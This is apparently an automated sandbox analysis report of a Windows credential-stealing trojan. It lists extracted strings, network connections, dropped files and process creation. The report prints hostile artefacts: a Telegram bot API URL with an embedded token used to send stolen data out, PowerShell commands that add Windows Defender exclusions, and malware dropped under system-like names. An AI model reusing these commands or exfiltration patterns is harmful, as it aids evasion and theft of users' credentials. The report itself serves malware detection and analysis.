Source: svchost.exe, 0000001A.00000003.2074424875.0000015553448000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000001A.00000003.2074424875.0000015553448000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000001A.00000003.2074424875.0000015553448000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000001A.00000003.2074424875.0000015553448000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000001A.00000003.2074424875.000001555347D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.26.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io
Source: powershell.exe, 00000009.00000002.3001390385.000001CD90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2187445854.0000022ECEC08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B93A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2187445854.0000022ECE9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B9181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734551000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2187445854.0000022ECEC08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B93A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000006.00000002.2187445854.0000022ECE9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2181290021.000001C2B9181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055740947.000001CD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2098904963.0000020A63311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2193786989.000002615E411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079916012.000002A734551000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: driverInto.exe, 00000004.00000002.1887356359.0000000002F22000.00000002.00000001.01000000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp, VaRrMrQM.log.25.dr String found in binary or memory: https://api.telegram.org/bot
Source: driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhotoX
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534A2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036F3000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.00000000036C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887356359.0000000002F22000.00000002.00000001.01000000.00000000.sdmp, VaRrMrQM.log.25.dr String found in binary or memory: https://ipinfo.io/country
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887356359.0000000002F22000.00000002.00000001.01000000.00000000.sdmp, VaRrMrQM.log.25.dr String found in binary or memory: https://ipinfo.io/ip
Source: powershell.exe, 00000009.00000002.3001390385.000001CD90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3224549621.000002616E484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01006FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_01006FAA
Source: C:\portintosvc\driverInto.exe File created: C:\Windows\Registration\csrss.exe
Source: C:\portintosvc\driverInto.exe File created: C:\Windows\Registration\886983d96e3d3e
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100848E 0_2_0100848E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01016CDC 0_2_01016CDC
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01017153 0_2_01017153
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010251C9 0_2_010251C9
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01014088 0_2_01014088
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010100B7 0_2_010100B7
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010040FE 0_2_010040FE
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010143BF 0_2_010143BF
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010162CA 0_2_010162CA
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010032F7 0_2_010032F7
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100C426 0_2_0100C426
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0102D440 0_2_0102D440
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100F461 0_2_0100F461
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010177EF 0_2_010177EF
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100E9B7 0_2_0100E9B7
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010319F4 0_2_010319F4
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100286B 0_2_0100286B
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0102D8EE 0_2_0102D8EE
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01024F9A 0_2_01024F9A
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100EFE2 0_2_0100EFE2
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01013E0B 0_2_01013E0B
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BAC0D78 4_2_00007FFD9BAC0D78
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BEBC1A1 4_2_00007FFD9BEBC1A1
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\DtICHrzA.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: String function: 0101EB78 appears 39 times
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: String function: 0101F5F0 appears 31 times
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: String function: 0101EC50 appears 56 times
Source: Vqzx4PFehn.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: driverInto.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: csrss.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: services.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XXPWErhsUbDrk.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XXPWErhsUbDrk.exe0.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XXPWErhsUbDrk.exe1.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@38/290@4/4
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01006C74 GetLastError,FormatMessageW, 0_2_01006C74
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_0101A6C2
Source: C:\portintosvc\driverInto.exe File created: C:\Program Files (x86)\windows defender\services.exe
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\DtICHrzA.log
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Mutant created: NULL
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-B36Ltm7X6ZT1qAIt57Ky
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\AppData\Local\Temp\gDT3vrmrV2
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Command line argument: sfxname 0_2_0101DF1E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Command line argument: sfxstime 0_2_0101DF1E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Command line argument: STARTDLG 0_2_0101DF1E
Source: Vqzx4PFehn.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 7ZM62vKokH.25.dr, XH0l3EA6US.25.dr, XFBJ4ivL6T.25.dr, aatb8W3AVz.25.dr, DdCBjfyxuu.25.dr, 4xF0ndNYR1.25.dr, DOZALIe7mA.25.dr, PzXT2lkpI9.25.dr, mOVdiwrw9I.25.dr, chBRvlN2pN.25.dr, ZaT8ByDEyf.25.dr, 4JEijRsXB3.25.dr, RGjzexYIco.25.dr, lbde1gtHxg.25.dr, xfipqq1p8e.25.dr, 1XLlMziEAg.25.dr, cm36ikub3D.25.dr, XHZm90MClc.25.dr, QOSa21ACkN.25.dr, 8bow8ajICu.25.dr, sYSYXONfMF.25.dr, 6RlmaiBDJh.25.dr, ioPbfUZlBC.25.dr, s5lJY8tuip.25.dr, c58700x8F4.25.dr, GdB4o2Atya.25.dr, xM1Nd8MkBx.25.dr, CdrHKSyFQn.25.dr, B4RFcMEvKM.25.dr, r3vpaV4K4x.25.dr, q5NoW3a56g.25.dr, 4nwBgY6nYM.25.dr, 8RQK1aDBdJ.25.dr, Vnl6vfjE2e.25.dr, k2kD7gtsCl.25.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Vqzx4PFehn.exe ReversingLabs: Detection: 60%
Source: Vqzx4PFehn.exe Virustotal: Detection: 70%
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe File read: C:\Users\user\Desktop\Vqzx4PFehn.exe
Source: unknown Process created: C:\Users\user\Desktop\Vqzx4PFehn.exe "C:\Users\user\Desktop\Vqzx4PFehn.exe"
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\portintosvc\driverInto.exe "C:\portintosvc/driverInto.exe"
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
